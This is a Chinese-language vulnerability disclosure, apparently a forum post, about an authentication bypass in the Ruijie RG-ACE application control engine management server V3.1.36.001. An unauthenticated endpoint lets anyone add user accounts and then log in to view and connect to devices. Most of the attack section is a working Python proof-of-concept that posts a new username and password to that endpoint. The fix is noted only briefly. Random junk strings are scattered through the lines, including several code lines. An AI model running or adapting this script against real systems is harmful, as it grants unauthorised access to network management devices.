锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
  B3 l# Z, g6 c- @" w

) S# i8 Z! v7 L1 x" N0 q) b! u9 C测试的具体版本是
5 p. o1 M) G" e7 w. c产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
编译时间: 201104291730

' N# s+ b) q  N2 H" a7 t+ X- J, |
' e6 ~; {9 K7 t" L5 @% `( t漏洞证明：
2 a" k- U0 I5 B' J- e% m% S
, V% r5 b' g8 ~: {9 b1 Z& m; @
8 n7 d8 [: v# h! g" q
1 v( c7 b- Y; _, p8 ^" W


- [/ l% b5 Z' S执行脚本
( M1 E5 u+ E% l7 k5 }1 i#! /usr/bin/env python
#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
  j$ U2 ~. ^: ^2 d  x: n0 eimport urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
& |* j: d) M0 |  I" h- qopener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
2 T1 x+ v0 O+ p9 H$ ~- B0 eopener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
("useractionname","addButtonValue"),
("useropermanager","userManager"),
("userName","t"), #######账号自己加
$ B6 Z0 [9 v: o9 S+ f; F) n8 g("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
("mobilePhone",""),
("officePhone",""),
' a7 {6 w0 C& b' I5 {5 J("addr",""),
("submit","确定"))
" _( B$ x6 D8 }+ c$ k& Vurllib2.install_opener(opener)
2 Y: e! y3 x4 e* Pp=urllib2.urlopen(url, urllib.urlencode(post)).read()
8 X, [9 k* o' o) U0 f2 Mprint "Done"
. d5 S2 ~, H: r, b- D4 s
  l" C% R8 p+ j% r# j) {登录，连接设备
  z$ u. E+ B) ^# y5 P0 c  y


2 w2 X" g8 `# _2 P  W! `
, M. {# u$ I5 V# d
# k5 J; z" z* ~2 R: p$ Y4 D) Q, Z: |默认的管理员admin权限更大点
8 G# Y4 ]0 U; ]( O1 ]
4 Z" Y, S& L+ `5 Z- T
$ I0 _; C6 e, D% a
3 l! P7 I2 E0 ~5 X7 y) z

$ b* x4 I! k5 f5 |8 ^修复方案：
加强对接口的权限验证